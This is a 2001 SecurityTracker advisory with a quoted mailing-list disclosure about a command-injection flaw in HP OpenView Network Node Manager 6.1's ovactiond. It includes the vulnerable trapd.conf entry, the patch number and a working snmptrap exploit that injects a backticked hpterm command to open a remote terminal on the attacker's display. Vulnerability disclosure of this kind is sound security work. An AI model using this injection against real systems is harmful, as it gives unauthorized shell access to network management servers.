HP's OpenView Network Node Manager Gives Remote Users Shell Access with User-level (bin) Privileges
|
|
SecurityTracker Alert ID: 1001711 |
|
SecurityTracker URL: http://securitytracker.com/id/1001711
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 8 2001
|
Impact:
Execution of arbitrary code via network, User access via network
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 6.1
|
Description:
A vulnerability has been reported in HP's OpenView Network Node Manager with the "ovactiond" module. The vulnerability in the module allows a remote user to obtain "bin" user-level access to the network management server.
The module is designed to start any executable program when a trap or event is received by Network Node Manager.
In the trapd.conf file, the following configuration is reportedly defined by default in NMM 6.1:
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
$10 1.3.[snip...]
#
If a remote user sends the following trap, the remote user can reportedly obtain remote terminal access with "bin" user privileges:
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3
s "\`/usr/bin/X11/hpterm -display <your client
display>\`" 4 s "" [snip...] 12 s ""
|
Impact:
A remote user can execute arbitrary commands on the server with the "bin" user-level privileges and can obtain shell access to the network management server.
|
Solution:
The vendor has released a patch (PHSS_23779). The patch reportedly checks for 'strange' characters in the input strings received through the event or trap.
|
Vendor URL: www.hp.com/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
UNIX (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 8 Jun 2001 06:12:07 -0000
Subject: HP Openview NNM6.1 ovactiond bin exploit
|
Hello,
Summery:
HP Openview NNM6.1 and earlier running on unix
have a problem with the suid bin executable
ovactiond. It allows for starting of any program by just
sending a trap or event to the station running the
daemon.
Details:
in the trapd.conf the following is defined by default
(NNM6.1):
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
$10 1.3.[snip...]
#
by sending this trap:
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3
s "\`/usr/bin/X11/hpterm -display <your client
display>\`" 4 s "" [snip...] 12 s ""
You get an hpterm on your client display running
under user bin on the NNM server.
The reason is that NNM first completes the command
under the EXEC and then starts that in a shell.
Path:
the patch to install is PHSS_23779 and is default in
all newest patch releases of NNM. This patch checks
for 'strange' characters in the input strings received
through the event or trap.
MAG,
Milo
PS: moderator, please inform me why you do/did not
place this message...
|
|
